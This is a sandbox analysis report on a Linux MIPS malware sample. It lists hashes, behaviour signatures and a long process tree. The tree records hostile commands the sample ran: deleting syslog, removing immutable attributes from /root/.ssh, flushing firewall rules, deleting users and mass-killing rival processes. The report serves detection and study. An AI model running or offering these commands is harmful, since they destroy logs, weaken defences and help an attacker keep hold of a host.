9d3ecfce98d1e6adf77c3132cefea45c8c82e8988f34ff874c1e93799e7fd59d

Analysis

max time kernel
150s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
08-09-2024 17:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d4d8b7039b8686c4053d95f9ce9133af_JaffaCakes118
Size

27KB
MD5

d4d8b7039b8686c4053d95f9ce9133af
SHA1

450bca999599e264b58ffba74140a57ed9d3921c
SHA256

9d3ecfce98d1e6adf77c3132cefea45c8c82e8988f34ff874c1e93799e7fd59d
SHA512

703095a7d895a48906c1252cd26caf0282ed0162f2b5f4ca87e23843215338b271c770dd2aa5cc7654fe46fade302919deea22c01171faff8a0b32cd79262ba2
SSDEEP

384:G7pQQwQHDf6jlpTWg3vMGQiKMvU/4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdeh:G7JVFNcD8FLcIwgiYq0xzBGy

Score

7^/10

defense_evasion discovery privilege_escalation

Malware Config

Signatures

Flushes firewall rules 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

pid	Process
708	iptables

Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

Abuse sudo or cached sudo credentials to execute code.

privilege_escalation defense_evasion

Sudo and Sudo Caching

T1548.003

pid	Process
713	sudo

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
781	xargs
818	xargs
903	xargs
830	xargs
836	xargs
724	chattr
1009	xargs
1059	xargs
1231	xargs
860	xargs
964	xargs
1266	xargs
875	xargs
1341	xargs
1373	xargs
1422	xargs
775	xargs
1113	xargs
1385	xargs
1052	xargs
1098	xargs
1079	xargs
1294	xargs
1400	xargs
806	xargs
888	xargs
949	xargs
990	xargs
726	chattr
737	grep
762	xargs
983	xargs
1179	xargs
1322	xargs
1392	xargs
706	chattr
842	xargs
1315	xargs
924	xargs
939	xargs
1092	xargs
1146	xargs
749	xargs
824	xargs
870	xargs
919	xargs
1211	xargs
1241	xargs
1033	xargs
1128	xargs
1282	xargs
1301	xargs
854	xargs
959	xargs
1021	xargs
1221	xargs
969	xargs
1133	xargs
1141	xargs
1206	xargs
944	xargs
1002	xargs
1271	xargs
914	xargs

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/21/status	ps
File opened for reading	/proc/952/status	ps
File opened for reading	/proc/10/cmdline	ps
File opened for reading	/proc/12/cmdline	ps
File opened for reading	/proc/457/cmdline	ps
File opened for reading	/proc/2/status	ps
File opened for reading	/proc/77/stat	ps
File opened for reading	/proc/326/cmdline	ps
File opened for reading	/proc/328/stat	ps
File opened for reading	/proc/21/stat	ps
File opened for reading	/proc/24/cmdline	ps
File opened for reading	/proc/879/stat	ps
File opened for reading	/proc/11/cmdline	ps
File opened for reading	/proc/320/cmdline	ps
File opened for reading	/proc/16/status	ps
File opened for reading	/proc/69/status	ps
File opened for reading	/proc/1182/cmdline	ps
File opened for reading	/proc/69/cmdline	ps
File opened for reading	/proc/141/stat	ps
File opened for reading	/proc/707/stat	ps
File opened for reading	/proc/383/cmdline	ps
File opened for reading	/proc/71/stat	ps
File opened for reading	/proc/457/status	ps
File opened for reading	/proc/111/stat	ps
File opened for reading	/proc/695/cmdline	ps
File opened for reading	/proc/695/cmdline	ps
File opened for reading	/proc/326/status	ps
File opened for reading	/proc/111/cmdline	ps
File opened for reading	/proc/sys/kernel/osrelease	ps
File opened for reading	/proc/2/stat	ps
File opened for reading	/proc/147/cmdline	ps
File opened for reading	/proc/696/status	ps
File opened for reading	/proc/1323/stat	ps
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/4/cmdline	ps
File opened for reading	/proc/2/cmdline	ps
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/7/cmdline	ps
File opened for reading	/proc/meminfo	ps
File opened for reading	/proc/15/status	ps
File opened for reading	/proc/8/stat	ps
File opened for reading	/proc/696/status	ps
File opened for reading	/proc/676/stat	ps
File opened for reading	/proc/487/stat	ps
File opened for reading	/proc/sys/kernel/osrelease	ps
File opened for reading	/proc/450/stat	ps
File opened for reading	/proc/14/stat	ps
File opened for reading	/proc/13/status	ps
File opened for reading	/proc/13/stat	ps
File opened for reading	/proc/388/cmdline	ps
File opened for reading	/proc/80/cmdline	ps
File opened for reading	/proc/5/cmdline	ps
File opened for reading	/proc/2/status	ps
File opened for reading	/proc/1014/status	ps
File opened for reading	/proc/372/cmdline	ps
File opened for reading	/proc/141/status	ps
File opened for reading	/proc/880/cmdline	ps
File opened for reading	/proc/7/stat	ps
File opened for reading	/proc/457/cmdline	ps
File opened for reading	/proc/37/stat	ps
File opened for reading	/proc/328/status	ps
File opened for reading	/proc/1/stat	ps
File opened for reading	/proc/meminfo	ps
File opened for reading	/proc/696/stat	ps

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/log_rot	d4d8b7039b8686c4053d95f9ce9133af_JaffaCakes118

/tmp/d4d8b7039b8686c4053d95f9ce9133af_JaffaCakes118
/tmp/d4d8b7039b8686c4053d95f9ce9133af_JaffaCakes118
1⤵
- Writes file to tmp directory
PID:697
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  PID:698
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  PID:701
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  - Attempts to change immutable files
  PID:706
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:708
- /usr/bin/sudo
  sudo sysctl "kernel.nmi_watchdog=0"
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  PID:713
- /usr/sbin/userdel
  userdel akay
  2⤵
  PID:717
- /usr/sbin/userdel
  userdel vfinder
  2⤵
  PID:720
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  - Attempts to change immutable files
  PID:724
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  - Attempts to change immutable files
  PID:726
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:728
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:730
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:731
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:732
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  PID:733
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  - Attempts to change immutable files
  PID:737
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:736
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:739
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:740
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:741
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:742
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:747
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:746
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:748
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:749
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:753
- /bin/grep
  grep :443
  2⤵
  PID:752
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:754
- /bin/grep
  grep -v -
  2⤵
  PID:755
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:756
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:760
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:759
- /bin/grep
  grep :23
  2⤵
  PID:758
- /bin/grep
  grep -v -
  2⤵
  PID:761
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:762
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:767
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:766
- /bin/grep
  grep :443
  2⤵
  PID:765
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:769
- /bin/grep
  grep -v -
  2⤵
  PID:768
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:772
- /bin/grep
  grep :143
  2⤵
  PID:771
- /bin/grep
  grep -v -
  2⤵
  PID:774
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:773
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:775
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:779
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:778
- /bin/grep
  grep :2222
  2⤵
  PID:777
- /bin/grep
  grep -v -
  2⤵
  PID:780
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:781
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:785
- /bin/grep
  grep :3333
  2⤵
  PID:784
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:786
- /bin/grep
  grep -v -
  2⤵
  PID:787
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:788
- /bin/grep
  grep :3389
  2⤵
  PID:790
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:791
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  - Reads runtime system information
  PID:792
- /bin/grep
  grep -v -
  2⤵
  PID:793
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:794
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:797
- /bin/grep
  grep :4444
  2⤵
  PID:796
- /bin/grep
  grep -v -
  2⤵
  PID:799
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:798
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:800
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:804
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:803
- /bin/grep
  grep :5555
  2⤵
  PID:802
- /bin/grep
  grep -v -
  2⤵
  PID:805
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:806
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:810
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:809
- /bin/grep
  grep :6666
  2⤵
  PID:808
- /bin/grep
  grep -v -
  2⤵
  PID:811
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:812
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:816
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:815
- /bin/grep
  grep :6665
  2⤵
  PID:814
- /bin/grep
  grep -v -
  2⤵
  PID:817
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:818
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:822
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:821
- /bin/grep
  grep :6667
  2⤵
  PID:820
- /bin/grep
  grep -v -
  2⤵
  PID:823
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:824
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:827
- /bin/grep
  grep :7777
  2⤵
  PID:826
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:828
- /bin/grep
  grep -v -
  2⤵
  PID:829
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:830
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:834
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:833
- /bin/grep
  grep :8444
  2⤵
  PID:832
- /bin/grep
  grep -v -
  2⤵
  PID:835
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:836
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:840
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:839
- /bin/grep
  grep :3347
  2⤵
  PID:838
- /bin/grep
  grep -v -
  2⤵
  PID:841
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:842
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:846
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:845
- /bin/grep
  grep :14444
  2⤵
  PID:844
- /bin/grep
  grep -v -
  2⤵
  PID:847
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:848
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:851
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:852
- /bin/grep
  grep :14433
  2⤵
  PID:850
- /bin/grep
  grep -v -
  2⤵
  PID:853
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:854
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:857
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:858
- /bin/grep
  grep :13531
  2⤵
  PID:856
- /bin/grep
  grep -v -
  2⤵
  PID:859
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:860
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:864
- /bin/grep
  grep -v grep
  2⤵
  PID:863
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:865
- /bin/grep
  grep "sleep 60"
  2⤵
  PID:862
- /bin/ps
  ps aux
  2⤵
  PID:861
- /bin/grep
  grep -v grep
  2⤵
  PID:868
- /bin/grep
  grep ./crun
  2⤵
  PID:867
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:866
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:870
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:869
- /usr/bin/awk
  awk "{if(\$3>80.0) print \$2}"
  2⤵
  PID:874
- /bin/grep
  grep -v grep
  2⤵
  PID:873
- /bin/grep
  grep -vw kdevtmpfsi
  2⤵
  PID:872
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:875
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:871
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:882
- /bin/grep
  grep :3333
  2⤵
  PID:881
- /bin/grep
  grep -v grep
  2⤵
  PID:880
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:883
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:879
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:887
- /bin/grep
  grep :5555
  2⤵
  PID:886
- /bin/grep
  grep -v grep
  2⤵
  PID:885
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:888
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:884
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:892
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:891
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:893
- /bin/grep
  grep -v grep
  2⤵
  PID:890
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:889
- /bin/grep
  grep log_
  2⤵
  PID:896
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:897
- /bin/grep
  grep -v grep
  2⤵
  PID:895
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:898
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:894
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:902
- /bin/grep
  grep systemten
  2⤵
  PID:901
- /bin/grep
  grep -v grep
  2⤵
  PID:900
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:899
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:903
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:907
- /bin/grep
  grep netns
  2⤵
  PID:906
- /bin/grep
  grep -v grep
  2⤵
  PID:905
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:908
- - /usr/local/sbin/kill
    kill -9 10
    3⤵
    PID:909
- - /usr/local/bin/kill
    kill -9 10
    3⤵
    PID:909
- - /usr/sbin/kill
    kill -9 10
    3⤵
    PID:909
- - /usr/bin/kill
    kill -9 10
    3⤵
    PID:909
- - /sbin/kill
    kill -9 10
    3⤵
    PID:909
- - /bin/kill
    kill -9 10
    3⤵
    - Reads CPU attributes
    PID:909
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:904
- /bin/grep
  grep voltuned
  2⤵
  PID:912
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:913
- /bin/grep
  grep -v grep
  2⤵
  PID:911
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:914
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:910
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  - Reads runtime system information
  PID:918
- /bin/grep
  grep darwin
  2⤵
  PID:917
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:919
- /bin/grep
  grep -v grep
  2⤵
  PID:916
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:915
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:923
- /bin/grep
  grep /tmp/dl
  2⤵
  PID:922
- /bin/grep
  grep -v grep
  2⤵
  PID:921
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:924
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:920
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:928
- /bin/grep
  grep /tmp/ddg
  2⤵
  PID:927
- /bin/grep
  grep -v grep
  2⤵
  PID:926
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:925
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:929
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:933
- /bin/grep
  grep /tmp/pprt
  2⤵
  PID:932
- /bin/grep
  grep -v grep
  2⤵
  PID:931
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:934
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:930
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:938
- /bin/grep
  grep /tmp/ppol
  2⤵
  PID:937
- /bin/grep
  grep -v grep
  2⤵
  PID:936
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:939
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:935
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:943
- /bin/grep
  grep "/tmp/65ccE*"
  2⤵
  PID:942
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:944
- /bin/grep
  grep -v grep
  2⤵
  PID:941
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:940
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:948
- /bin/grep
  grep "/tmp/jmx*"
  2⤵
  PID:947
- /bin/grep
  grep -v grep
  2⤵
  PID:946
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:949
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:945
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:953
- /bin/grep
  grep "/tmp/2Ne80*"
  2⤵
  PID:952
- /bin/grep
  grep -v grep
  2⤵
  PID:951
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:954
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:950
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:958
- /bin/grep
  grep IOFoqIgyC0zmf2UR
  2⤵
  PID:957
- /bin/grep
  grep -v grep
  2⤵
  PID:956
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:959
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:955
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:963
- /bin/grep
  grep 45.76.122.92
  2⤵
  PID:962
- /bin/grep
  grep -v grep
  2⤵
  PID:961
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:964
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:960
- /bin/grep
  grep -v grep
  2⤵
  PID:966
- /bin/grep
  grep 51.38.191.178
  2⤵
  PID:967
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:968
- /bin/ps
  ps aux
  2⤵
  PID:965
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:969
- /bin/grep
  grep 51.15.56.161
  2⤵
  PID:974
- /bin/grep
  grep -v grep
  2⤵
  PID:973
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:972
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:975
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:976
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:982
- /bin/grep
  grep 86s.jpg
  2⤵
  PID:981
- /bin/grep
  grep -v grep
  2⤵
  PID:980
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:983
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:979
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:989
- /bin/grep
  grep aGTSGJJp
  2⤵
  PID:988
- /bin/grep
  grep -v grep
  2⤵
  PID:987
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:990
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:986
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:995
- /bin/grep
  grep nMrfmnRa
  2⤵
  PID:994
- /bin/grep
  grep -v grep
  2⤵
  PID:993
- /bin/ps
  ps aux
  2⤵
  PID:992
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:996
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1001
- /bin/grep
  grep PuNY5tm2
  2⤵
  PID:1000
- /bin/grep
  grep -v grep
  2⤵
  PID:999
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1002
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:998
- /bin/grep
  grep I0r8Jyyt
  2⤵
  PID:1007
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1008
- /bin/grep
  grep -v grep
  2⤵
  PID:1006
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1009
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1005
- /bin/grep
  grep AgdgACUD
  2⤵
  PID:1012
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1013
- /bin/grep
  grep -v grep
  2⤵
  PID:1011
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1014
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1010
- /bin/grep
  grep -v grep
  2⤵
  PID:1018
- /bin/grep
  grep uiZvwxG8
  2⤵
  PID:1019
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1020
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1017
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1021
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1027
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1026
- /bin/grep
  grep -v grep
  2⤵
  PID:1025
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1028
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1024
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1032
- /bin/grep
  grep BtwXn5qH
  2⤵
  PID:1031
- /bin/grep
  grep -v grep
  2⤵
  PID:1030
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1033
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1029
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1039
- /bin/grep
  grep 3XEzey2T
  2⤵
  PID:1038
- /bin/grep
  grep -v grep
  2⤵
  PID:1037
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1036
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1040
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1046
- /bin/grep
  grep t2tKrCSZ
  2⤵
  PID:1045
- /bin/grep
  grep -v grep
  2⤵
  PID:1044
- /bin/ps
  ps aux
  2⤵
  PID:1043
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1047
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1051
